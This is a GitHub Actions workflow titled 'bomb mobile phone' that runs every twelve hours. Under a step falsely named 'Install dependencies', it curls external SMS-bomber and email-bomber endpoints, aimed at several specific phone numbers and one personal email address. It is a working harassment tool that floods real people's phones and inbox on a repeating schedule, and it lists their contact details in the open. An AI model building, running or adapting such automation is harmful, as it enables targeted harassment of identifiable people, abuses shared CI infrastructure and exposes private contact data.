name: bomb mobile phone 

on:
  schedule:
    - cron: '0 */12 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - name: Install Python 3
      uses: actions/setup-python@v2
      with:
        python-version: 3.8
    - name: Install dependencies
      run: |
        curl https://xlr8-sh.herokuapp.com/
        sleep 300
        echo https://xlr8-sh.herokuapp.com/bomb/9868796414
        sleep 300
        curl https://xlr8-sh.herokuapp.com/
        curl https://email-bomber.herokuapp.com/bomb/punya.bhasin@dpssl.net
        sleep 300
        curl https://xlr8-sh.herokuapp.com/bomb/9891110582
        sleep 300
        curl https://xlr8-sh.herokuapp.com/
        sleep 300
        curl https://xlr8-sh.herokuapp.com/bomb/9811354915
        sleep 300
        curl https://xlr8-sh.herokuapp.com/
        sleep 300
        curl https://xlr8-sh.herokuapp.com/bomb/9711996166
        sleep 300
        echo https://xlr8-sh.herokuapp.com/bomb/7808850437
        curl https://xlr8-sh.herokuapp.com/bomb/7600888111
        sleep 300
        echo compleated 
        date
